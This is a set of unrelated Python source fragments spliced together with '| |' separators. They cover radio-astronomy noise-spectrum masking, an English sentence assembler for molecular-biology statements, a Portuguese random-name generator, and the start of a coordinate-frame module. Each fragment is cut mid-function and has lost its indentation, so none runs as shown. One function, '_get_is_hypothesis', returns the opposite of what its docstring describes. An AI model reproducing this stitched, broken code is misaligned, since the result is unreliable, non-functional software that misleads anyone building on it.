# broadcast problems with single pol
self.weights_array *= (input.integration_time[:, np.newaxis, np.newaxis, np.newaxis] * input.nsample_array)
cross_bool = self.ant_1_array != self.ant_2_array
auto_bool = self.ant_1_array == self.ant_2_array
if self.spectrum_type == "cross":
has_crosses = np.any(cross_bool)
if not has_crosses:
raise ValueError("Requested spectrum type is 'cross', but no cross"
" correlations exist. Check SS input.")
has_autos = np.any(auto_bool)
if has_autos:
warnings.warn("Requested spectrum type is 'cross'. Removing autos before averaging.")
self.select(ant_str="cross")
elif self.spectrum_type == "auto":
has_autos = np.any(auto_bool)
if not has_autos:
raise ValueError("Requested spectrum type is 'auto', but no autos"
" exist. Check SS input.")
has_crosses = np.any(cross_bool)
if has_crosses:
warnings.warn("Requested spectrum type is 'auto'. Removing"
" crosses before averaging.")
self.select(ant_str="auto")
super().to_waterfall(method='mean', return_weights_square=True)
# Make sure the right type of spectrum is being used, otherwise raise errors.
# If neither statement inside is true, then it is an old spectrum and is therefore a cross-only spectrum.
elif spec_type_str not in self.history:
if "Initialized spectrum_type:" in self.history:
raise ValueError("Requested spectrum type disagrees with saved spectrum. "
"Make opposite choice on initialization.")
elif self.spectrum_type == "auto":
raise ValueError("Reading in a 'cross' spectrum as 'auto'. Check"
" spectrum_type for INS initialization.")
if not hasattr(self.metric_array, 'mask'):
self.metric_array = np.ma.masked_array(self.metric_array)
if mask_file is None:
# Only mask elements initially if no baselines contributed
self.metric_array.mask = self.weights_array == 0
else:
# Read in the flag array
flag_uvf = UVFlag(mask_file)
self.metric_array.mask = np.copy(flag_uvf.flag_array)
del flag_uvf
if match_events_file is None:
self.match_events = []
"""A list of tuples that contain information about events caught during match filtering"""
else:
self.match_events = self.match_events_read(match_events_file)
# For backwards compatibilty before weights_square_array was a thing
# Works because weights are all 1 or 0 before this feature was added
if self.weights_square_array is None:
self.weights_square_array = np.copy(self.weights_array)
self.metric_ms = self.mean_subtract()
"""An array containing the z-scores of the data in the incoherent noise spectrum."""
self.sig_array = np.ma.copy(self.metric_ms)
"""An array that is initially equal to the z-score of each data point. During flagging,
the entries are assigned according to their z-score at the time of their flagging."""
def mean_subtract(self, freq_slice=slice(None), return_coeffs=False):
"""
A function which calculated the mean-subtracted spectrum from the
regular spectrum. A spectrum made from a perfectly clean observation
will be written as a z-score by this operation.
Args:
freq_slice: The frequency slice over which to do the calculation. Usually not
set by the user.
return_coeffs: Whether or not to return the mean/polynomial coefficients
Returns:
MS (masked array): The mean-subtracted data array.
"""
if self.spectrum_type == 'cross':
# This constant is determined by the Rayleigh distribution, which
# describes the ratio of its rms to its mean
C = 4 / np.pi - 1
else:
# This involves another constant that results from the folded normal distribution
# which describes the amplitudes of the auto-pols.
# The cross-pols have Rayleigh distributed amplitudes.
C_ray = 4 / np.pi - 1
C_fold = np.pi / 2 - 1
C_pol_map = {-1: C_fold, -2: C_fold, -3: C_ray, -4: C_ray,
-5: C_fold, -6: C_fold, -7: C_ray, -8: C_ray}
C = np.array([C_pol_map[pol] for pol in self.polarization_array])
if not self.order:
coeffs = np.ma.average(self.metric_array[:, freq_slice], axis=0, weights=self.weights_array[:, freq_slice])
weights_factor = self.weights_array[:, freq_slice] / np.sqrt(C * self.weights_square_array[:, freq_slice])
MS = (self.metric_array[:, freq_slice] / coeffs - 1) * weights_factor
else:
MS = np.zeros_like(self.metric_array[:, freq_slice])
coeffs = np.zeros((self.order + 1, ) + MS.shape[1:])
# Make sure x is not zero so that np.polyfit can proceed without nans
x = np.arange(1, self.metric_array.shape[0] + 1)
# We want to iterate over only a subset of the frequencies, so we need to investigate
y_0 = self.metric_array[:, freq_slice]
# Find which channels are not fully masked (only want to iterate over those)
# This gives an array of channel indexes into the freq_slice
good_chans = np.where(np.logical_not(np.all(y_0.mask, axis=0)))[0]
# Only do this if there are unmasked channels
if len(good_chans) > 0:
# np.ma.polyfit does not take 2-d weights (!!!) so we just do the slow implementation and go chan by chan, pol-by-pol
for chan in good_chans:
for pol_ind in range(self.Npols):
y = self.metric_array[:, chan, pol_ind]
w = self.weights_array[:, chan, pol_ind]
w_sq = self.weights_square_array[:, chan, pol_ind]
# Make the fit
coeff = np.ma.polyfit(x, y, self.order, w=w)
coeffs[:, chan, pol_ind] = coeff
# Do the magic
mu = np.sum([coeff[poly_ind] * x**(self.order - poly_ind)
for poly_ind in range(self.order + 1)],
axis=0)
weights_factor = w / np.sqrt(C * w_sq)
MS[:, chan, pol_ind] = (y / mu - 1) * weights_factor
else:
MS[:] = np.ma.masked
if return_coeffs:
return(MS, coeffs)
else:
return(MS)
def mask_to_flags(self):
"""
Propagates the mask to construct flags for the original
(non time-differenced) data. If a time is flagged in the INS, then both
times that could have contributed to that time in the sky-subtraction
step are flagged in the new array.
Returns:
tp_flags (array): The time-propagated flags
"""
# Propagate the flags
shape = list(self.metric_array.shape)
tp_flags = np.zeros([shape[0] + 1] + shape[1:], dtype=bool)
tp_flags[:-1] = self.metric_array.mask
tp_flags[1:] = np.logical_or(tp_flags[1:], tp_flags[:-1])
return(tp_flags)
def flag_uvf(self, uvf, inplace=False):
"""
Applies flags calculated from mask_to_flags method onto a given UVFlag
object. Option to edit an existing uvf object inplace. Works by
propagating the mask on sky-subtracted data to flags that can be applied
to the original data, pre-subtraction. ORs the flags from the INS
object and the input uvf object.
Args:
uvf: A waterfall UVFlag object in flag mode to apply flags to. Must be
constructed from the original data. Errors if not waterfall,
in flag mode, or time ordering does not match INS object.
inplace: Whether to edit the uvf input inplace or not. Default False.
Returns:
uvf: The UVFlag object in flag mode with the time-propagated flags.
"""
if uvf.mode != 'flag':
raise ValueError("UVFlag object must be in flag mode to write flags from INS object.")
| |
[]
for m in agent.mods:
if m.position is None:
if m.residue is not None:
residue_str =\
ist.amino_acids[m.residue]['full_name']
mod_lst.append(residue_str)
else:
mod_lst.append('an unknown residue')
elif m.position is not None and m.residue is None:
mod_lst.append('amino acid %s' % m.position)
else:
mod_lst.append(m.residue + m.position)
agent_str += _join_list(mod_lst)
# Handle activity conditions
if agent.activity is not None:
# Get the modifier specific to the activity type, if any
pre_prefix = \
activity_type_prefix.get(agent.activity.activity_type, '')
if agent.activity.is_active:
prefix = pre_prefix + 'active'
else:
# See if there is a special override for the inactive form
if agent.activity.activity_type in inactivity_type_prefix_override:
pre_prefix = inactivity_type_prefix_override[
agent.activity.activity_type]
prefix = pre_prefix + 'inactive'
agent_str = prefix + ' ' + agent_str
return AgentWithCoordinates(agent_str, agent.name, agent.db_refs)
def english_join(lst):
"""Join a list of strings according to English grammar.
Parameters
----------
lst : list of str
A list of strings to join.
Returns
-------
str
A string which describes the list of elements, e.g.,
"apples, pears, and bananas".
"""
return _join_list(lst, oxford=True)
def _join_list(lst, oxford=True):
"""Join a list of words in a grammatically correct way."""
if len(lst) > 2:
s = ', '.join(lst[:-1])
if oxford:
s += ','
s += ' and ' + lst[-1]
elif len(lst) == 2:
s = lst[0] + ' and ' + lst[1]
elif len(lst) == 1:
s = lst[0]
else:
s = ''
return s
def _assemble_activeform(stmt):
"""Assemble ActiveForm statements into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.agent)
sb = SentenceBuilder()
sb.append(subj_str)
if stmt.is_active:
is_active_str = 'active'
else:
is_active_str = 'inactive'
if stmt.activity == 'activity':
sb.append(' is ')
elif stmt.activity == 'kinase':
sb.append(' is kinase-')
elif stmt.activity == 'phosphatase':
sb.append(' is phosphatase-')
elif stmt.activity == 'catalytic':
sb.append(' is catalytically ')
elif stmt.activity == 'transcription':
sb.append(' is transcriptionally ')
elif stmt.activity == 'gtpbound':
sb.append(' is GTP-bound ')
sb.append(is_active_str)
sb.make_sentence()
return sb
def _assemble_modification(stmt):
"""Assemble Modification statements into SentenceBuilder object."""
sub_str = _assemble_agent_str(stmt.sub)
sb = SentenceBuilder()
if stmt.enz is not None:
enz_str = _assemble_agent_str(stmt.enz)
if _get_is_direct(stmt):
mod_str = ' ' + _mod_process_verb(stmt) + ' '
else:
mod_str = ' leads to the ' + _mod_process_noun(stmt) + ' of '
sb.append_as_sentence([enz_str, mod_str, sub_str])
else:
sb.append_as_sentence([sub_str, ' is ', _mod_state_stmt(stmt)])
if stmt.residue is not None:
if stmt.position is None:
mod_str = ' on ' + ist.amino_acids[stmt.residue]['full_name']
else:
mod_str = ' on ' + stmt.residue + stmt.position
elif stmt.position is not None:
mod_str = ' at position %s' % stmt.position
else:
mod_str = ''
sb.append(mod_str)
sb.make_sentence()
return sb
def _assemble_association(stmt):
"""Assemble Association statements into SentenceBuilder object."""
member_strs = [_assemble_agent_str(m.concept) for m in stmt.members]
sb = SentenceBuilder()
sb.append(member_strs[0])
sb.append(' is associated with ')
sb.append_as_list(member_strs[1:])
sb.make_sentence()
return sb
def _assemble_complex(stmt):
"""Assemble Complex statements into SentenceBuilder object."""
member_strs = [_assemble_agent_str(m) for m in stmt.members]
sb = SentenceBuilder()
sb.append(member_strs[0])
sb.append(' binds ')
sb.append_as_list(member_strs[1:])
sb.make_sentence()
return sb
def _assemble_autophosphorylation(stmt):
"""Assemble Autophosphorylation statements into SentenceBuilder object."""
enz_str = _assemble_agent_str(stmt.enz)
sb = SentenceBuilder()
sb.append(enz_str)
sb.append(' phosphorylates itself')
if stmt.residue is not None:
if stmt.position is None:
mod_str = ' on ' + ist.amino_acids[stmt.residue]['full_name']
else:
mod_str = ' on ' + stmt.residue + stmt.position
else:
mod_str = ''
sb.append(mod_str)
sb.make_sentence()
return sb
def _assemble_regulate_activity(stmt):
"""Assemble RegulateActivity statements into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.subj)
obj_str = _assemble_agent_str(stmt.obj)
if stmt.is_activation:
rel_str = ' activates '
else:
rel_str = ' inhibits '
sb = SentenceBuilder()
sb.append_as_sentence([subj_str, rel_str, obj_str])
sb.make_sentence()
return sb
def _assemble_regulate_amount(stmt):
"""Assemble RegulateAmount statements into SentenceBuilder object."""
obj_str = _assemble_agent_str(stmt.obj)
sb = SentenceBuilder()
if stmt.subj is not None:
subj_str = _assemble_agent_str(stmt.subj)
if isinstance(stmt, ist.IncreaseAmount):
rel_str = ' increases the amount of '
elif isinstance(stmt, ist.DecreaseAmount):
rel_str = ' decreases the amount of '
sb.append_as_sentence([subj_str, rel_str, obj_str])
else:
sb.append(obj_str)
if isinstance(stmt, ist.IncreaseAmount):
sb.append(' is produced')
elif isinstance(stmt, ist.DecreaseAmount):
sb.append(' is degraded')
sb.make_sentence()
return sb
def _assemble_translocation(stmt):
"""Assemble Translocation statements into SentenceBuilder object."""
agent_str = _assemble_agent_str(stmt.agent)
sb = SentenceBuilder()
sb.append_as_sentence([agent_str, ' translocates'])
if stmt.from_location is not None:
sb.append_as_sentence([' from the ', stmt.from_location])
if stmt.to_location is not None:
sb.append_as_sentence([' to the ', stmt.to_location])
sb.make_sentence()
return sb
def _assemble_gap(stmt):
"""Assemble Gap statements into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.gap)
obj_str = _assemble_agent_str(stmt.ras)
sb = SentenceBuilder()
sb.append_as_sentence([subj_str, ' is a GAP for ', obj_str])
sb.make_sentence()
return sb
def _assemble_gef(stmt):
"""Assemble Gef statements into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.gef)
obj_str = _assemble_agent_str(stmt.ras)
sb = SentenceBuilder()
sb.append_as_sentence([subj_str, ' is a GEF for ', obj_str])
sb.make_sentence()
return sb
def _assemble_conversion(stmt):
"""Assemble a Conversion statement into SentenceBuilder object."""
reactants = [_assemble_agent_str(r) for r in stmt.obj_from]
products = [_assemble_agent_str(r) for r in stmt.obj_to]
sb = SentenceBuilder()
if stmt.subj is not None:
subj_str = _assemble_agent_str(stmt.subj)
sb.append(subj_str)
sb.append(' catalyzes the conversion of ')
sb.append_as_list(reactants)
sb.append(' into ')
sb.append_as_list(products)
else:
sb.append_as_list(reactants)
sb.append(' is converted into ')
sb.append_as_list(products)
sb.make_sentence()
return sb
def _assemble_influence(stmt):
"""Assemble an Influence statement into SentenceBuilder object."""
subj_str = _assemble_agent_str(stmt.subj.concept)
obj_str = _assemble_agent_str(stmt.obj.concept)
sb = SentenceBuilder()
# Note that n is prepended to increase to make it "an increase"
if stmt.subj.delta.polarity is not None:
subj_delta_str = ' decrease' if stmt.subj.delta.polarity == -1 \
else 'n increase'
sb.append_as_sentence(['a', subj_delta_str, ' in ', subj_str])
else:
sb.append(subj_str)
sb.append(' causes ')
if stmt.obj.delta.polarity is not None:
obj_delta_str = ' decrease' if stmt.obj.delta.polarity == -1 \
else 'n increase'
sb.append_as_sentence(['a', obj_delta_str, ' in ', obj_str])
else:
sb.append(obj_str)
sb.make_sentence()
return sb
def _make_sentence(txt):
"""Make a sentence from a piece of text."""
# Make sure first letter is capitalized
txt = txt.strip(' ')
txt = txt[0].upper() + txt[1:] + '.'
return txt
def _get_is_direct(stmt):
"""Return True if there is any evidence that the statement is direct.
If any of the evidences associated with the statement
indicates a direct interaction then we assume the interaction
is direct. If there is no evidence for the interaction being indirect
then we default to direct.
"""
any_indirect = False
for ev in stmt.evidence:
if ev.epistemics.get('direct') is True:
return True
elif ev.epistemics.get('direct') is False:
# This guarantees that we have seen at least
# some evidence that the statement is indirect
any_indirect = True
if any_indirect:
return False
return True
def _get_is_hypothesis(stmt):
"""Return True if there is only evidence that the statement is hypothetical.
If all of the evidences associated with the statement
indicate a hypothetical interaction then we assume the interaction
is hypothetical.
"""
for ev in stmt.evidence:
if not ev.epistemics.get('hypothesis') is True:
return True
return False
def _get_is_hypothesis_adverb(stmt):
"""Return the string associated with a statement being hypothetical."""
if _get_is_hypothesis(stmt):
return ' hypothetically '
else:
return ''
def _mod_process_verb(stmt):
# Example: Phosphorylation -> phosphorylates
mod_name = stmt.__class__.__name__.lower()
return statement_present_verb(mod_name)
def _mod_process_noun(stmt):
# Example: Phosphorylation -> phosphorylation
mod_name = stmt.__class__.__name__.lower()
return mod_name
def _mod_state_stmt(stmt):
# Example: Phosphorylation -> phosphorylated
mod_name = stmt.__class__.__name__.lower()
return statement_passive_verb(mod_name)
def _mod_state_str(s):
return statement_passive_verb(s)
def statement_passive_verb(stmt_type):
"""Return the passive / state verb form of a statement type.
Parameters
----------
stmt_type : str
The lower case string form of a statement type, for instance,
'phosphorylation'.
Returns
-------
str
The passive/state verb form of a statement type, for instance,
'phosphorylated'.
"""
override = {
'complex': 'bound',
'regulateamount': 'amount regulated',
'decreaseamount': 'decreased',
'increaseamount': 'increased',
'gap': 'GAP-regulated',
'gef': 'GEF-regulated',
'gtpactivation': 'GTP-activated',
'influence': 'influenced',
'event': 'happened',
'conversion': 'converted',
'modification': 'modified',
'addmodification': 'modified',
'removemodification': 'unmodified',
'regulateactivity': 'activity regulated',
}
return override.get(stmt_type) if stmt_type in override else \
stmt_type[:-3] + 'ed'
def statement_present_verb(stmt_type):
"""Return the present verb form of a statement type.
Parameters
----------
stmt_type : str
The lower case string form of a statement type, for instance,
'phosphorylation'.
Returns
-------
str
The present verb form of a statement type, for instance,
'phosphorylates'.
"""
override = {
'complex': 'binds',
'regulateamount': 'regulates the amount of',
'increaseamount': 'increases the amount of',
'decreaseamount': 'decreases the amount of',
'gef': 'acts as a GEF for',
'gap': 'acts as a GAP for',
'inhibition': 'inhibits',
'gtpactivation': 'activates when bound to GTP',
'regulateactivity': 'regulates the activity of',
'activeform': 'has active form',
'conversion': 'converts',
'influence': 'influences',
'modification': 'modifies',
'addmodification': 'adds a modification to',
'removemodification': 'removes a modification of',
'selfmodification': 'modifies itself',
'event': 'happens'
}
return override.get(stmt_type) if stmt_type in override else \
stmt_type[:-3] + 'es'
def statement_base_verb(stmt_type):
"""Return the base verb form of a statement type.
Parameters
----------
stmt_type : str
The lower case string form | |
import random
from dataclasses import dataclass
from typing import Any, Callable, cast, List, Sequence, TypeVar, Union
T = TypeVar('T')
c_str = Callable[[], str]
S = Union[str, c_str]
def is_function(x: Any) -> bool:
return hasattr(x, '__call__')
def random_element(*itens: T) -> T:
return random.sample(itens, 1)[0]
def resolve_s(i: S) -> str:
if is_function(i):
f: c_str = cast(c_str, i)
return f()
if isinstance(i, str):
return i
raise Exception(i)
def up(item: S) -> c_str:
def inner() -> str:
x: str = resolve_s(item)
return x[0].upper() + x[1:]
return inner
def choice_s(*itens: S) -> c_str:
def inner() -> str:
while True:
x: str = resolve_s(random_element(*itens))
if x != '': return x
return inner
def choice_s_epsilon(*itens: S) -> c_str:
def inner() -> str:
return resolve_s(random_element(*itens))
return inner
def seq_s(*itens: S) -> c_str:
def inner() -> str:
out: str = ""
for item in itens:
s: str = resolve_s(item)
out += s
return out
return inner
nome_masculino: c_str = choice_s(
"Abílio", "Ademar", "Adílson", "Adônis", "Adriano", "Aécio", "Alan", "Albano", "Alberto", "Albino", "Aldo", "Alessandre", "Alex", "Alexandre", "Alfredo", "Ali", "Alisson", "Aloísio", "Altair", "Altino", "Álvaro", "Amarildo", "Anakin", "Anderson", "André", "Ângelo", "Antônio", "Armando", "Arnaldo", "Artur", "Arthur", "Augusto", "Aurélio", "Áureo", "Avelino", "Ayrton",
"Baltazar", "Barnabé", "Bartolomeu", "Batista", "Benedito", "Benjamin", "Bento", "Bernardo", "Beto", "Bóris", "Breno", "Bruno",
"Caio", "Camilo", "Carlos", "Cauê", "Celso", "César", "Charles", "Chico", "Cícero", "Cirilo", "Ciro", "Cléber", "Cleberson", "Cristiano",
"Damião", "Daniel", "Danilo", "Dante", "Dário", "Davi", "David", "Décio", "Demilson", "Denis", "Diego", "Diogo", "Dionísio", "Domingos",
"Ederson", "Edinaldo", "Edivaldo", "Edson", "Edu", "Eduardo", "Elano", "Elias", "Eliel", "Elói", "Emanoel", "Emílio", "Eric", "Estevão", "Eugênio", "Eustáquio", "Everaldo", "Everton", "Ezequiel",
"Fabiano", "Fábio", "Fabrício", "Fagner", "Felipe", "Félix", "Filipe", "Fernando", "Flávio", "Francisco", "Fred", "Frederico",
"Gabriel", "Geraldo", "Gilberto", "Giovanni", "Giuseppe", "Gilmar", "Gilson", "Guilherme", "Gustavo",
"Hamilton", "Heitor", "Helder", "Hélio", "Henrique", "Hércules", "Heron", "Hildebrando", "Hilton", "Hugo", "Humberto",
"Iago", "Igor", "Inácio", "Isaías", "Isac", "Ismael", "Israel", "Itamar", "Ivan",
"Jacinto", "Jack", "Jackson", "Jair", "Jairo", "Jânio", "Jason", "Jardel", "Jaziel", "Jean", "Jeferson", "Jesus", "João", "João", "João", "João", "Joaquim", "Joel", "Jonas", "Jonathan", "Jonathas", "Jorge", "José", "José", "José", "Josiel", "Juan", "Júlio", "Juliano", "Junior",
"Karl", "Kauê", "Kevin", "Kim",
"Laércio", "Laerte", "Leandro", "Leo", "Leonardo", "Leopoldo", "Lino", "Luan", "Lucas", "Lúcio", "Luciano", "Luigi", "Luís", "Luiz", "Luke",
"Manoel", "Manuel", "Marcelo", "Marciano", "Márcio", "Marco", "Marcos", "Mariano", "Mário", "Marlon", "Martin", "Martinho", "Mateus", "Matheus", "Maurício", "Max", "Micael", "Michel", "Miguel", "Mike", "Milton", "Moacyr", "Moisés", "Murilo",
"Nathan", "Nelson", "Ney", "Nicolas", "Nicolau", "Nilo", "Nilton", "Nivaldo",
"Olavo", "Oliver", "Omar", "Orlando", "Oséas", "Osório", "Osvaldo", "Otaviano", "Otávio", "Otto",
"Pablo", "Patrick", "Paulo", "Paulo", "Pedro", "Plínio",
"Quico", "Quirino",
"Rafael", "Raí", "Ramon", "Raul", "Reginaldo", "Reinaldo", "Renato", "Ricardo", "Ricardo", "Rivaldo", "Robert", "Roberto", "Roberval", "Robson", "Rodrigo", "Rodrigo", "Rodolfo", "Roger", "Rogério", "Romildo", "Ronaldo",
"Samuel", "Sandro", "Saulo", "Sebastião", "Sérgio", "Severino", "Silvair", "Sílvio", "Simão",
"Táles", "Tiago", "Thiago", "Tomáz", "Toninho", "Túlio",
"Uribe",
"Valter", "Victor", "Vinícius", "Vitor",
"Wagner", "Wally", "Walter", "Washington", "Wellington", "Wesley", "Willian", "Wilson",
"Xavier", "Xerxes",
"Yuri",
"Zeca"
)
nome_feminino: c_str = choice_s(
"Abigail", "Adriana", "Adrielle", "Alana", "Albina", "Alessandra", "Aline", "Amália", "Amanda", "Amélia", "Ana", "Ana", "Ana", "Ana", "Ana", "Anna", "Anne", "Andréia", "Andressa", "Ângela", "Angélica", "Aparecida", "Ariana", "Ariel", "Arilda", "Arlete",
"Bárbara", "Beatriz", "Bella", "Berenice", "Bernadete", "Bete", "Bianca", "Brenda", "Bruna",
"Camila", "Carla", "Cármen", "Carolina", "Caroline", "Cássia", "Catarina", "Cecília", "Celeste", "Célia", "Celina", "Charlene", "Christie", "Cibele", "Cícera", "Cíntia", "Clara", "Clarice", "Cláudia", "Cleuza", "Clotilde", "Cristiane", "Cristina",
"Damares", "Daiane", "Daniela", "Danielle", "Dara", "Denise", "Diana", "Dilma", "Dina",
"Ediane", "Edilene", "Eduarda", "Elaine", "Eleonora", "Eleriane", "Eliane", "Elisa", "Elizabete", "Elisete", "Eliomar", "Elisângela", "Eloá", "Érica", "Eulália", "Eunice", "Eva", "Evelyn",
"Fabiana", "Fabíola", "Fátima", "Fernanda", "Felícia", "Flávia", "Flaviana", "Francielle",
"Gabriela", "Gabrielle", "Genir", "Gigi", "Gilmara", "Gisele", "Gislaine", "Graziele", "Guiomar",
"Helena", "Hellen", "Heloísa", "Hilda",
"Isabel", "Isabela", "Ingrid", "Isaiane", "Ísis", "Itamara", "Ivanete", "Ivete", "Ivone",
"Janaína", "Jandira", "Janete", "Jaqueline", "Jeniffer", "Jenny", "Jéssica", "Joelma", "Josiane", "Josilda", "Joyce", "Júlia", "Juliana", "Jussara",
"Karin", "Karina", "Kátia", "Kelly", "Keyla", "Kiara",
"Laila", "Laís", "Lana", "Lara", "Larissa", "Laura", "Léia", "Leila", "Leonara", "Lena", "Leni", "Liane", "Lidiane", "Lígia", "Lili", "Lilian", "Lina", "Lisa", "Lívia", "Luara", "Lúcia", "Luciana", "Luiza", "Luzia", "Luzimara", "Luzinete",
"Madalena", "Magali", "Maíra", "Maísa", "Manuela", "Mara", "Marcela", "Márcia", "Marciane", "Marcielle", "Margarete", "Margarida", "Maria", "Maria", "Maria", "Maria", "Maria", "Maria", "Mariana", "Marielle", "Marilúcia", "Marina", "Marlene", "Marli", "Marta", "Matilde", "Mayara", "Mayra", "Meire", "Mel", "Melanie", "Melissa", "Michele", "Mikaella", "Milene", "Mirela", "Mirian", "Mônica", "Monique",
"Nádia", "Nair", "Natália", "Nayara", "Neila", "Nicole", "Núbia",
"Olga", "Olímpia", "Olívia", "Otávia",
"Patrícia", "Patrícia", "Paula", "Paula", "Paula", "Paulínia", "Priscila", "Poliana",
"Quênia", "Quésia", "Quitéria",
"Rafaela", "Raiane", "Raíssa", "Raquel", "Rebeca", "Regina", "Renata", "Rita", "Roberta", "Rosa", "Rosana", "Rosângela", "Rose", "Roseli", "Rosilda", "Rosimeire", "Rute",
"Sabrina", "Samanta", "Samara", "Sâmia", "Samila", "Sandra", "Sara", "Selena", "Selma", "Sheila", "Shirley", "Simone", "Sílvia", "Solange", "Sônia", "Soraya", "Suellen", "Suely", "Susan", "Suzana", "Suzanne", "Suzy",
"Tábata", "Tânia", "Taís", "Tainá", "Tainara", "Talita", "Tatiana", "Tatiane", "Telma", "Teresa", "Terezinha", "Thaís", "Thaíssa", "Tina",
"Úrsula",
"Valdirene", "Valéria", "Valeska", "Valquíria", "Vanda", "Vanessa", "Vânia", "Velma", "Vera", "Verônica", "Vitória", "Violeta", "Vívian", "Viviane",
"Walderice", "Wanda", "Wendy", "Wilma",
"Xilena",
"Yasmin", "Yeda", "Yolanda",
"Zara", "Zenaide", "Zilda", "Zuleide", "Zulmira"
)
sobrenome_comum: c_str = choice_s(
"de Barbosa", "Gomes", "de Oliveira", "de Pereira", "dos Santos", "dos Santos", "de Souza", "de Souza", "da Silva", "da Silva", "da Silva", "da Silva"
)
sobrenome_incomum: c_str = choice_s(
"de Abreu", "de Aguiar", "de Albuquerque", "de Alcântara", "de Alencar", "de Almeida", "de Alvarenga", "de Álvares", "de Alves", "de Alvim", "do Amaral", "do Amazonas", "de Amorim", "de Andrade", "de Angola", "de Antunes", "de Arantes", "de Araújo", "de Arruda", "de Assis", "de Assunção", "de Ayres", "de Azevedo",
"Bahia", "Banhos", "de Barboza", "de Barros", "Barroso", "de Bezerra", "de Braga", "de Bragança", "de Brandão", "Brasil", "de Brito", "de Britto", "Borba", "de Borges", "Branco", "Buarque", "de Bueno",
"de Cabral", "de Camargo", "Câmara", "de Campos", "de Cardoso", "de Cardozo", "de Carvalho", "Castelo", "<NAME>", "de Castro", "Cavalcante", "de Cerqueira", "de Chaves", "de Coelho", "da Conceição", "da Costa", "Coutinho", "Couto", "da Cruz", "da Cunha",
"d'Ávila", "Dias", "de Diniz", "de Drummond", "de Duarte", "Duque", "Dutra",
"da Encarnação", "Espada", "de Espanha", "do Espírito Santo", "Estrada",
"de Farias", "de Ferreira", "de Fernandes", "de Ferraz", "de Figueira", "de Figueiredo", "de Fonseca", "Fontes", "Fortes", "de Fraga", "Fragoso", "de França", "Franco", "Freire", "de Freitas", "Frias",
"da Gama", "de Garcia", "de Gimenes", "de Godoy", "Góis", "de Gonçalves", "da Graça", "Guedes", "Guerra", "de Guimarães", "de Gusmão", "de Gusmões", "Gutierrez",
"Herrera", "de Holanda",
"de Iglesias", "Igreja",
"Jangada", "Jardim", "de Jesus", "de Junqueira",
"Klein",
"de Lacerda", "de Leão", "de Leite", "de Lemes", "de Lemos", "de Lima", "de Linhares", "de Lins", "da Lira", "de Lisboa", "Lopes", "da Luz",
"de Macedo", "de Machado", "Maciel", "de Madureira", "de Magalhães", "de Maia", "de Malta", "do Maranhão", "Marinho", "Marques", "de Martins", "Martinez", "da Mata", "de Matos", "de Medeiros", "de Meireles", "de Melo", "de Mello", "Mendes", "de Mendonça", "de Menezes", "Mercado", "Milani", "Mineiro", "de Miranda", "de Monteiro", "de Morais", "de Moreira", "Moreno", "de Moura", "Mourão", "de Munhoz", "de Muniz",
"do Nascimento", "Naves", "Negrão", "das Neves", "da Nóbrega", "de Nogueira", "de Noronha", "de Novais", "Nunes",
"de Oliva", "de Ortega", "de Ortiz", "de Osório",
"de Pacheco", "de Padilha", "Paim", "da Paixão", "de Paiva", "de Palhares", "da Paraíba", "do Paraná", "de Paranhos", "de Parreira", "de Pascoal", "de Paula", "da Paz", "de Peixoto", "Penedo", "de Peres", "Pimenta", "de Pimentel", "Pinhão", "dos Pinhais", "de Pinheiro", "do Piauí", "Pinto", "Pires", "Portugal", "do Prado", "Prates", "Preto",
"de Queiroz",
"de Ramos", "Rangel", "dos Reis", "de Rezende", "Ribeiro", "do Rio", "da Rocha", "Rodrigues", "Rosa", "Rosatto", "Rossi",
"de Sá", "de Sales", "de Salgado", "de Salvador", "de Sampaio", "Sanches", "de Santana", "de Santo Antônio", "de São Pedro", "Schmidt", "Schneider", "Seixas", "da Serra", "de Silveira", "de Simões", "de Siqueira", "de Soares", "de Sobral", "Souto",
"de Tavares", "de Teixeira", "Teles", "de Torquato", "Trevisan", "de Trindade", "Tristão", "de Toledo", "Torres", "de Tozetto",
"de Uchôa",
"do Vale", "Valente", "Valverde", "de Vargas", "Vasco", "de Vasconcelos", "Vaz", "de Viana", "de Vieira",
"Weber", "Weiss", "Werner",
"Ximenes",
#Y
#Z
)
def remove_de(nome: str) -> str:
i: int = nome.find(" ")
return nome if i == -1 or nome[0:i] in ["de", "da", "do", "das", "dos"] else nome[i + 1:]
def sobrenome_normal() -> str:
nome: str = choice_s(sobrenome_comum, sobrenome_incomum, sobrenome_incomum, sobrenome_incomum)()
return choice_s(nome, remove_de(nome))()
def sobrenome_random_japones() -> str:
silaba_japones: c_str = choice_s(
"a", "i", "u", "e", "o",
"ka", "ki", "ku", "ke", "ko",
"sa", "shi", "su", "se", "so",
"ta", "chi", "tsu", "te", "to",
"na", "ni", "nu", "ne", "no",
"ha", "hi", "fu", "he", "ho",
"ma", "mi", "mu", "me", "mo",
"ya", "yu", "yo",
"ra", "ri", "ru", "re", "ro",
"wa", "wo",
| |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""
Provides a set of coordinate frames.
----
.. include license and copyright
.. include:: ../include/copy.rst
----
.. include common links, assuming primary doc root is up one directory
.. include:: ../include/links.rst
"""
import numpy
from scipy import linalg
class SemiMajorAxisCoo:
r"""
Calculate the semi-major axis coordinates given a set of input
parameters following :math:`{\mathbf x} = {\mathbf A}^{-1}\ {\mathbf
b}`, where
.. math::
{\mathbf A} = \left[
\begin{array}{rrrrrr}
1 & 0 & 0 & 0 & 0 & 0 \\
0 & 1 & 0 & 0 & 0 & 0 \\
\cos\psi & \sin\psi & -1 & 0 & 0 & 0 \\
-\sin\psi & \cos\psi & 0 & -1 & 0 & 0 \\
0 & 0 & \sin\phi_0 & \cos\phi_0 & -1 & 0 \\
0 & 0 & -\cos\phi_0 & \sin\phi_0 & 0 & \varepsilon-1
\end{array}
\right]
{\mathbf b} = \left[
\begin{array}{r}
x_f \\
y_f \\
-x_0 \\
-y_0 \\
0 \\
0
\end{array}
\right]
such that
.. math::
{\mathbf x} = \left[
\begin{array}{r}
x_f \\
y_f \\
x_s \\
y_s \\
x_a \\
y_a
\end{array}
\right]
and:
- :math:`\psi` is the Cartesian rotation of the focal-plane
relative to the sky-plane (+x toward East; +y toward North),
- :math:`\phi_0` is the on-sky position angle of the major axis
of the ellipse, defined as the angle from North through East
- :math:`\varepsilon=1-b/a` is the ellipticity based on the the
semi-minor to semi-major axis ratio (:math:`b/a`).
- :math:`(x_f,y_f)` is the sky-right, focal-plane position
